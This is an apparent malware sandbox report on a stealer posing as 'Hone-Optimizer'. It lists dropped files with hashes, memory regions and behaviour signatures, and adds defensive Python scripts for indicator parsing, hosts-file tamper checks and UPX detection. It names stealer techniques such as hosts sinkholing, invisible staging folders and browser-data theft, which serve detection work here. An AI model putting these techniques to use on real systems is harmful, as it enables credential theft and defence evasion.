SHA512 59847d34e836e03ce76ec54f8e6b4d936614cceed557c9841deb7c8b3c09e1d0e33005caa406115f1354f84c3c1a69dda341d27e6488f11954b3aaa7179df7df

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\HideSave.docx

MD5 b23c0c501dfd49c39b8a158658c9de76
SHA1 3f333eff9005d66574db2cac161d6d4ec1f1d395
SHA256 c13f486d9d45afc6e342fbbcaf97f0ca4c777b795b6d485dbee1dadc4e270a99
SHA512 e7ae0b215d8c782497f6ddb06d86d6638a361adef2a2a29f92c7f2f9efe0eb4307f7ff95cc5ccd4cadfb13dd78d1bdfabbf396a83bddbcbc58cac769bb727d93

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\SkipSet.docx

MD5 207dda302ac10a56baea60fb711be19d
SHA1 fede41bfef029b3d2f1e9b3693d2b9ff6f173440
SHA256 f498bbb3b71bef839647fe7e99a900147aad882827e1f87e38d599717f23ebce
SHA512 8e9cfea08899a2333f6f4df3c73e72162b6e88bb8d253391e5ec049bef2387e2231c961a72be25793ebeb56fab09356ec71491c39045ed0f7247d05422ff9692

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Documents\SplitUse.xls

MD5 0e94f365847ed174b1d279c30ce93d79
SHA1 eef20652624960061663aa4998e020353cf27a5e
SHA256 2a3bf98554b3f749fea140b82f8faebbe4479216cc892a7bd199a84b2a2d99b6
SHA512 6dd49f7241c49a3353333a0a20dcd90798b74991ea16f834b7f94f430fb99791dd0f8c3337b6e3137ada7014c87e574e404a0539fae3fc4dff260b0aba0dc6a1

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Downloads\AddMerge.mp3

MD5 8ee839b57567fec88b03929d0074aa6f
SHA1 5ff68ff3d2b5ebd6ed8ffaf054d25b8a42347eb3
SHA256 b56337a303413a90e9eebd9cb4e7d3d7c500d7bd9e09af099f333f34366c9b12
SHA512 6a8f29738d634fe8ac5ead2c9a9bf5a2ff4d426205d56a6d23f926be696a3dfd7239e83bbadca09ebbd52b73b8a928dbba0bcc413c2dca8b3c7de01a68616655

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Downloads\BackupDisconnect.ocx

MD5 ec3c3bcd86266e5a9dc286032b0046f3
SHA1 31205b539bacbfe684b799c2fc3c89497d4d706d
SHA256 65de26b2c5e000547c11d0d64f87afbce00ffa6e7f858ce0c96ce4b53973ce5d
SHA512 5632408912919a900be629ce7838c9610cfd7c5bbbb47be4a3a6325a0ac720bfdcd1d4a181c3fa2c0824bb5feb37a022836de7f5eec2b9a9e913d9a6a3b5235c

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Downloads\RepairApprove.pdf

MD5 bc38348960550c99d68b15ac3253fd6d
SHA1 a78d5ebb673465830ad06720dd54739b013d44ce
SHA256 8d080b786caf9b36fadaef9063d36885fdebc5c1b8222a84582bb45722002302
SHA512 a0dd71248af3e4cbf4987bcafd7bd04a9a34249dcc7731ad344f00adcf03cd0ec620717a20a0b9aad02ce858f62d59075ff1fe5983e919500b3ccd74c58dac1b

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Downloads\ResolveSwitch.docx

MD5 33c4c952892f6fd578b9c8b4f9779271
SHA1 a2ce70b65f1e3599d84f5479f0860bc2753704b5
SHA256 4623c39393fda37e18041c7124487447975d56735dbcd78ba019fec2ebede8d1
SHA512 b60e6368d89f6bc5e8c399ae8f905f2893c24987543c2bcf3a3a5012fb34ac58d23aeeed08e9504fac20851e695bd67a8e221ae93965ace6c88fde35d2453214

C:\Users\Admin\AppData\Local\Temp\ ​  ‍  ‎ ​\Common Files\Downloads\WaitDismount.docx

MD5 acefb00c59c3252a8a702121cd7f426d
SHA1 0bb216020e4c1ba462f15629d219d5963fe15902
SHA256 6799b938c02e5c781c8d6363ee94a739132627c663734b75a17ac69107834ddc
SHA512 5c2a5ce3d4a0ccfe94a8f9d1d62de0d26273c0e1265a9325618f7a1efa9cd0d27834680332c6bb7002125c5ad0c9e0eefea91dfcf5663edf15d3eb5ea6ee5254

memory/3632-256-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp

memory/3632-262-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp

memory/3632-257-0x00007FFB53770000-0x00007FFB53793000-memory.dmp

memory/4432-281-0x000001BBF6150000-0x000001BBF636D000-memory.dmp

memory/3632-312-0x00007FFB52CE0000-0x00007FFB52D03000-memory.dmp

memory/3632-318-0x00007FFB43760000-0x00007FFB4382D000-memory.dmp

memory/3632-317-0x00007FFB43830000-0x00007FFB43D50000-memory.dmp

memory/3632-316-0x00007FFB4A4E0000-0x00007FFB4A513000-memory.dmp

memory/3632-315-0x00007FFB57A20000-0x00007FFB57A2D000-memory.dmp

memory/3632-314-0x00007FFB535B0000-0x00007FFB535C9000-memory.dmp

memory/3632-313-0x00007FFB43F70000-0x00007FFB440E7000-memory.dmp

memory/3632-311-0x00007FFB57C30000-0x00007FFB57C49000-memory.dmp

memory/3632-310-0x00007FFB53570000-0x00007FFB5359D000-memory.dmp

memory/3632-309-0x00007FFB5D070000-0x00007FFB5D07F000-memory.dmp

memory/3632-308-0x00007FFB53770000-0x00007FFB53793000-memory.dmp

memory/3632-307-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp

memory/3632-306-0x00007FFB43640000-0x00007FFB4375C000-memory.dmp

memory/3632-305-0x00007FFB536D0000-0x00007FFB536DD000-memory.dmp

memory/3632-304-0x00007FFB52BD0000-0x00007FFB52BE4000-memory.dmp

C:\Windows\Logs\DISM\dism.log

MD5 3516b679779fb751a5b99ec1e2ac47aa
SHA1 2d0666acf799dbe2010bac34f485f62cd2f54c1b
SHA256 5b63f7dea0f62243e2336135a409f5a791d23673cc6fd1b3e9ab467797fdf6b4
SHA512 7edc5688ebc5bf917332c7a74a4fc77b1f22a7549260835e94a9922c8a8a85b29176833844dec4bc80aacc0b4c6811ee439f7f67485889209a5c98ed2c9fc0bd

C:\Users\Admin\AppData\Local\Temp\REG53B.tmp

MD5 d9d87947864e599c0c9e561743f727b5
SHA1 c35191953263416c1a3f72169a80e34d3c9bf41f
SHA256 765bc555c9c31b1500ef267138fe2d120ebc39fa855dfbf9da6b4a65b6f7578d
SHA512 b6f52c644522ab995d0d882704f874ea3c7eb05fd494c497411ac57ee421af6ed9eaf727ae8b0a87c553cebf616a856e97e0508b8482a532ab64bba7e8949066

memory/2640-364-0x0000000000BB0000-0x0000000000BBC000-memory.dmp

memory/2640-365-0x00000000054A0000-0x00000000054BA000-memory.dmp

memory/1900-405-0x0000000004880000-0x0000000004881000-memory.dmp

memory/2660-421-0x000002A528DA0000-0x000002A528DC0000-memory.dmp

memory/2660-439-0x000002A528DC0000-0x000002A528DE0000-memory.dmp

memory/2660-438-0x000002A528DE0000-0x000002A528E00000-memory.dmp

memory/2660-455-0x000002A53B8D0000-0x000002A53B9D0000-memory.dmp

memory/4232-505-0x0000000002B40000-0x0000000002B41000-memory.dmp

memory/2288-522-0x00000270EFDD0000-0x00000270EFDF0000-memory.dmp

memory/2288-540-0x00000270F0400000-0x00000270F0420000-memory.dmp

memory/2288-539-0x00000270F0420000-0x00000270F0440000-memory.dmp

memory/2288-554-0x00000270F3810000-0x00000270F3910000-memory.dmp

memory/3180-605-0x0000000004560000-0x0000000004561000-memory.dmp

memory/3548-607-0x000002AB42900000-0x000002AB42A00000-memory.dmp

memory/3548-632-0x000002B344C70000-0x000002B344C90000-memory.dmp

memory/3548-630-0x000002B344C90000-0x000002B344CB0000-memory.dmp

memory/3548-621-0x000002B344C50000-0x000002B344C70000-memory.dmp

memory/3548-654-0x000002B358360000-0x000002B358460000-memory.dmp

memory/3348-705-0x0000000004DC0000-0x0000000004DC1000-memory.dmp

memory/2492-706-0x000002A972140000-0x000002A972240000-memory.dmp

memory/2492-707-0x000002A972140000-0x000002A972240000-memory.dmp

memory/2492-728-0x000002A973640000-0x000002A973660000-memory.dmp

memory/2492-739-0x000002A973660000-0x000002A973680000-memory.dmp

memory/2492-738-0x000002A973680000-0x000002A9736A0000-memory.dmp

memory/2492-753-0x000002A975CD0000-0x000002A975DD0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\4NUNBTRQ\microsoft.windows[1].xml

MD5 d6c1b4bb94dc9522fb7c83c87ea5d841
SHA1 19ea83a7d4fe8b02f285c684bdb48727c97e9196
SHA256 f1551216ac0ba29d3b3ad772ff70fd8baa6ca6194df69d51248e425884027608
SHA512 05b9aaf43e5464d43f8b4baf7ba913f0a87b5c5adc5c5a8c865982fa341380542fc6c6dd6953bdfd826dfd0cba7db120be206730cead002dcb1b743c80cf4e34

memory/4864-806-0x0000000000FC0000-0x0000000000FC1000-memory.dmp

memory/1200-809-0x0000017407C00000-0x0000017407D00000-memory.dmp

memory/1200-810-0x0000017407C00000-0x0000017407D00000-memory.dmp

memory/1200-808-0x0000017407C00000-0x0000017407D00000-memory.dmp

memory/1200-841-0x0000017C0A400000-0x0000017C0A420000-memory.dmp

memory/1200-840-0x0000017C0A6F0000-0x0000017C0A710000-memory.dmp

memory/1200-823-0x0000017C0A1D0000-0x0000017C0A1F0000-memory.dmp
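The Files section above is a flat listing: a path line, then MD5, SHA1, SHA256 and SHA512 lines, with memory-region dumps listed as bare paths and no hashes. The PyInstaller extraction directory (_MEI22922) is where the family attribution in the overview becomes concrete: blank.aes and bound.blank are named after the BlankGrabber family, and rar.exe with its rarreg.key licence file is a bundled command-line archiver that has no place inside an "optimizer". Further down, copies of the user's Documents and Downloads files were written under a Temp directory whose name consists only of spaces and zero-width characters, so it is invisible in most directory listings. The parser below is an added example (not the report's or the sandbox's code) that turns the listing into records, builds a SHA256 lookup for hash hunting and flags those three indicators. The SAMPLE text is a constructed excerpt of the listing (SHA512 lines left out for brevity; the same regex accepts them), and the invisible directory name is approximated with explicit escapes rather than the page's exact byte sequence.

```python
"""Parse the dropped-file listing above into records and flag BlankGrabber
artifacts (added example; not the report's or the sandbox's code)."""
import re
import unicodedata
from dataclasses import dataclass, field

HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-f]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
PYINSTALLER_DIR = re.compile(r"\\_MEI\d+\\", re.IGNORECASE)   # PyInstaller onefile temp dir
# Names the listing shows inside _MEI22922 that point at this family
# (a judgement made for this example, not a vendor signature).
BLANKGRABBER_NAMES = {"blank.aes", "bound.blank", "rar.exe", "rarreg.key"}


@dataclass
class FileRecord:
    path: str
    hashes: dict = field(default_factory=dict)   # algorithm -> hex digest


def parse_records(text):
    """A path line opens a record; following hash lines attach to it.
    Memory dumps appear as bare paths and end up with an empty hash dict."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m and current is not None:
            algo, digest = m.groups()
            if len(digest) != HASH_LEN[algo]:
                raise ValueError(f"{algo} digest of wrong length for {current.path}")
            current.hashes[algo] = digest
        else:
            current = FileRecord(path=line)
            records.append(current)
    return records


def _basename(path):
    return path.rsplit("\\", 1)[-1]


def _has_invisible_component(path):
    """True if a directory name is made only of spaces / format characters
    (Unicode categories Zs and Cf), the trick used for the staging folder above."""
    return any(comp and all(unicodedata.category(c) in ("Zs", "Cf") for c in comp)
               for comp in path.split("\\"))


def blankgrabber_indicators(records):
    hits = {"pyinstaller_bundle": [], "blankgrabber_files": [], "invisible_dir": []}
    for r in records:
        if r.path.startswith("memory/"):
            continue
        if PYINSTALLER_DIR.search(r.path):
            hits["pyinstaller_bundle"].append(r.path)
        if _basename(r.path).lower() in BLANKGRABBER_NAMES:
            hits["blankgrabber_files"].append(r.path)
        if _has_invisible_component(r.path):
            hits["invisible_dir"].append(r.path)
    return hits


def sha256_lookup(records):
    """SHA256 -> path, ready for an EDR hash search or a blocklist."""
    return {r.hashes["SHA256"]: r.path for r in records if "SHA256" in r.hashes}


# Constructed excerpt of the listing above (SHA512 lines omitted; invisible
# directory name approximated with explicit escapes).
SAMPLE = """\
C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI22922\\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967

memory/3632-26-0x00007FFB443B0000-0x00007FFB44999000-memory.dmp

C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI22922\\blank.aes

MD5 52b5788c281513d74bf5f1ee6a989cb8
SHA1 379318c37380fc6a3fbd50a66940cb44b9ff61e8
SHA256 c1e49817d2969a3ecd721eecefe95b4baa4583af4eecf550df32675685b6193f

C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI22922\\bound.blank

MD5 cad54859340aaefe3491c1e3bb6ab204
SHA1 751d2dd0769585f334d7b77c0b07a8c7051f91aa
SHA256 f7c3e0c208aa535125a233c7c2ced5aba53537ed6d093464c25bc68521d5082b

C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI22922\\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

C:\\Users\\Admin\\AppData\\Local\\Temp\\ \u200b \u200d \u200e\u200b\\Common Files\\Documents\\ApproveGroup.xlsx

MD5 b71ac26955cfd2794b7790778093aceb
SHA1 d45882428f419c0b440c03e7a28e8ea95c03cdd9
SHA256 a7c15b34c1afcdd4d622d301c20368fc438688b8d239dd4c714f073652c1c99e
"""
```

The hash-length check matters when the listing has been copied through a browser or a ticketing system that wraps or truncates long digests; a silently shortened SHA256 would otherwise produce a lookup key that never matches anything. The invisible-directory test is deliberately categorical (any component made only of Zs/Cf characters) rather than matching the exact sequence seen here, because the sequence is trivial for the author to change.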

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-14 11:53

Reported

2024-11-14 11:59

Platform

win11-20241007-en

Max time kernel

334s

Max time network

337s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe"

Signatures

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
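The three rows above record the hosts file being opened for modification by the sample itself and twice by attrib.exe, whose only job is to change file attributes (the read-only and hidden flags a writer would need cleared first), and the Files section gives the SHA256 of the resulting file (a040d4...). The report does not show what was written, but the hosts file is the cheapest way for a stealer to blind AV updates and telemetry by pointing vendor domains at 0.0.0.0 or 127.0.0.1, and a stock Windows hosts file contains only comments, so any active mapping on a workstation is worth explaining. The check below is an added example, not part of the report: it compares a hosts file against the report's hash and lists mappings that sinkhole a name or redirect a watched domain. WATCHED_SUFFIXES and the SAMPLE_HOSTS content are constructed for the example and are not what this sample wrote.

```python
"""Hosts-file tamper check (added example; not from the report)."""
import hashlib
import ipaddress

# SHA256 of the modified hosts file as listed in the Files section above.
REPORT_HOSTS_SHA256 = "a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0"

SINKHOLE_TARGETS = {"0.0.0.0", "127.0.0.1", "::1", "::"}
LOCAL_NAMES = {"localhost", "localhost.localdomain", "broadcasthost"}
# Assumed watch list for this example: domains a stealer gains from blocking.
WATCHED_SUFFIXES = ("virustotal.com", "microsoft.com", "avast.com", "malwarebytes.com")


def parse_hosts(text):
    """[(ip, hostname, line_no)] for every active mapping; comments and
    malformed lines are skipped the way the resolver skips them."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = str(ipaddress.ip_address(parts[0]))
        except ValueError:
            continue
        entries.extend((ip, host.lower(), n) for host in parts[1:])
    return entries


def matches_report_sample(data: bytes) -> bool:
    """True if the file on disk is byte-identical to the one the sandbox saw."""
    return hashlib.sha256(data).hexdigest() == REPORT_HOSTS_SHA256


def suspicious_entries(text):
    """Mappings that sinkhole any name, or redirect a watched domain elsewhere."""
    flagged = []
    for ip, host, n in parse_hosts(text):
        if host in LOCAL_NAMES:
            continue
        if ip in SINKHOLE_TARGETS:
            flagged.append((n, host, ip, "sinkholed"))
        elif host.endswith(WATCHED_SUFFIXES):
            flagged.append((n, host, ip, "redirected"))
    return flagged


# Constructed hosts file for the example: the stock Windows header (which has
# only commented-out mappings) followed by entries of the kind a stealer adds.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 127.0.0.1       localhost
# ::1             localhost
0.0.0.0 www.virustotal.com
0.0.0.0 virustotal.com   # constructed entry
127.0.0.1 www.malwarebytes.com
203.0.113.9 update.microsoft.com
10.0.0.5 intranet.corp.example
"""

if __name__ == "__main__":
    print("matches sandbox copy:", matches_report_sample(SAMPLE_HOSTS.encode()))
    for n, host, ip, why in suspicious_entries(SAMPLE_HOSTS):
        print(f"line {n}: {host} -> {ip} ({why})")
```

On a live host, read C:\Windows\System32\drivers\etc\hosts as bytes for the hash comparison (a text read would normalise line endings and break it) and treat a hash match as confirmation of this exact sample; a non-match only means the content differs, which is expected for any other build of the stealer or any later edit, so the entry listing is the durable check. The intranet.corp.example line is deliberately not flagged: ordinary corporate mappings exist, and the point is to surface sinkholes and vendor-domain redirects, not every line.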

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Hone-Optimizer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
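The sandbox reports 57 UPX matches above without naming the files. Because the sample is a PyInstaller bundle, and PyInstaller compresses the binaries it bundles with UPX when UPX is installed at build time, the matches need not be the top-level executable; checking the dropped DLLs and .pyd files from the _MEI22922 directory individually is the way to find out which ones are packed. The following is an added example (not report or sandbox code) of that check in pure Python: it walks the PE section table and reports both the UPX section names and the structural layout that survives renaming the sections, a first section with zero raw size but a large virtual size mapped executable and writable, which is where the stub writes the unpacked image at run time. The two inputs are header-only PE images constructed inside the script; they are not runnable binaries and not files from the report.

```python
"""UPX section check on a PE image (added example; not from the report)."""
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def pe_sections(data: bytes):
    """[(name, virtual_size, raw_size, characteristics)] from the section table.
    Raises ValueError when the buffer is not a PE file."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsect = struct.unpack_from("<H", data, e_lfanew + 6)[0]       # NumberOfSections
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]   # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                               # IMAGE_SECTION_HEADER[]
    sections = []
    for i in range(nsect):
        (name, vsize, _vaddr, rsize, _rptr, _, _, _, _, chars) = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("latin-1"), vsize, rsize, chars))
    return sections


def upx_indicators(data: bytes):
    """Name match (UPX0/UPX1/...) plus the structural tell that survives renaming:
    a first section with no raw data but a large, writable, executable virtual
    range, into which the stub unpacks the original image at run time."""
    secs = pe_sections(data)
    named = [s[0] for s in secs if s[0].upper().lstrip(".").startswith("UPX")]
    layout = False
    if secs:
        _name, vsize, rsize, chars = secs[0]
        rwx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
        layout = rsize == 0 and vsize >= 0x1000 and (chars & rwx) == rwx
    return {"upx_named_sections": named, "upx0_layout": layout}


def build_test_pe(section_specs):
    """Header-only PE32+ image with the given sections (constructed test input;
    it has no code and cannot be executed)."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt = b"\0" * 240   # size of a PE32+ optional header; contents irrelevant here
    file_hdr = struct.pack("<HHIIIHH", 0x8664, len(section_specs), 0, 0, 0, len(opt), 0x22)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, rsize, 0, 0, 0, 0, 0, chars)
        for name, vsize, vaddr, rsize, chars in section_specs)
    return dos + b"PE\0\0" + file_hdr + opt + table


# Typical UPX layout: empty UPX0 reservation, UPX1 with compressed data + stub, .rsrc.
UPX_LIKE = build_test_pe([
    (b"UPX0", 0x20000, 0x1000, 0, 0xE0000080),       # UNINITIALIZED_DATA | RWX
    (b"UPX1", 0x8000, 0x21000, 0x8000, 0xE0000040),  # INITIALIZED_DATA | RWX
    (b".rsrc", 0x1000, 0x29000, 0x1000, 0xC0000040),
])
# A linker-produced layout for contrast.
PLAIN = build_test_pe([
    (b".text", 0x5000, 0x1000, 0x5000, 0x60000020),  # CODE | EXECUTE | READ
    (b".data", 0x1000, 0x6000, 0x400, 0xC0000040),   # INITIALIZED_DATA | READ | WRITE
])

if __name__ == "__main__":
    print("UPX-like:", upx_indicators(UPX_LIKE))
    print("plain:   ", upx_indicators(PLAIN))
```

Run upx_indicators(open(path, "rb").read()) over every .dll, .pyd and .exe extracted from the bundle; a hit on upx0_layout with no UPX-named sections means the section names were rewritten, which is itself a stronger signal than stock UPX. Files that report both can usually be restored with a plain "upx -d" before static analysis, whereas renamed or modified stubs will not unpack that way and need a runtime dump instead.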

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Logs\DISM\dism.log C:\Windows\system32\Dism.exe N/A
File opened for modification C:\Windows\Logs\DISM\dism.log C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
